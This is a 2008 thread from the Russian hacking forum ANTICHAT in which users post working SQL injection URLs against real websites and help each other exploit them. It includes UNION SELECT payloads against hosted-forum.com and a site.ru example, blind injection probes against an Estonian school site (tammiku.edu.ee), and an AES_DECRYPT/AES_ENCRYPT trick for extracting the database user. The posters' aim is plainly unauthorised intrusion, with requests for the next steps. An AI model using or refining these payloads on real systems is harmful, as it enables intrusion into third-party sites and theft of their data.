HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.04.2008, 21:56
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами: 9800721

Репутация: 4
По умолчанию

Вы правильно думаете. Я в принципе спрашиваю. Насколько понимаю, возможна))
 
Ответить с цитированием

  #2  
Старый 15.04.2008, 21:59
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

2 VentRu
А почему бы и нет ? Конечно, возможно
 
Ответить с цитированием

  #3  
Старый 15.04.2008, 22:10
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию

Код:
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
помогите дальше двинуться)
 
Ответить с цитированием

  #4  
Старый 16.04.2008, 00:38
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами: 9568860

Репутация: 146
По умолчанию

Цитата:
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
где ты тут нашел sql ? )


ща проверил,скуля есть, вчера не было )))))
видать сервак глючил или админ....

Последний раз редактировалось bag; 16.04.2008 в 12:27..
 
Ответить с цитированием

  #5  
Старый 16.04.2008, 17:05
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами: 9800721

Репутация: 4
По умолчанию

Вчера смотрел, они с базой какие-то работы проводили.
 
Ответить с цитированием

  #6  
Старый 17.04.2008, 17:55
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.tammiku.edu.ee/arhiv/06-07.php?month=1&year='

Ншёл сканер скулю. Сколько ни мудилсо, ниче вывести не смог ))).При запросе из баз выводит форбидден:Р. Зато запросы вида 1'+and+'2'='1&year=2008 пашут.Почему именно столько кавычек я хз.Есть подозрения, что для двойки две кавычки потому, что ид соответствует строковая переменная. Запоролся в общем йа : )(Это уже Blind sql inj).
 
Ответить с цитированием

  #7  
Старый 17.04.2008, 21:43
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http:/www.tammiku.edu.ee/arhiv/06-07.php?month=4'+and+'1'='0&year=2008

Шо тут гадать то:Р
 
Ответить с цитированием

  #8  
Старый 18.04.2008, 11:14
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7/*
работает,

то на странице отображается 3 и 5

но когда хочу поставить version() то не работает ..
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,ve rsion(),4,5,6,7/*
выдаёт ошибку
как надо сделать ?
 
Ответить с цитированием

  #9  
Старый 18.04.2008, 11:24
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

короче нашёл

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),6,7/*

работает, что я могу дальше ?
 
Ответить с цитированием

  #10  
Старый 18.04.2008, 12:12
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

nicusor version() ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.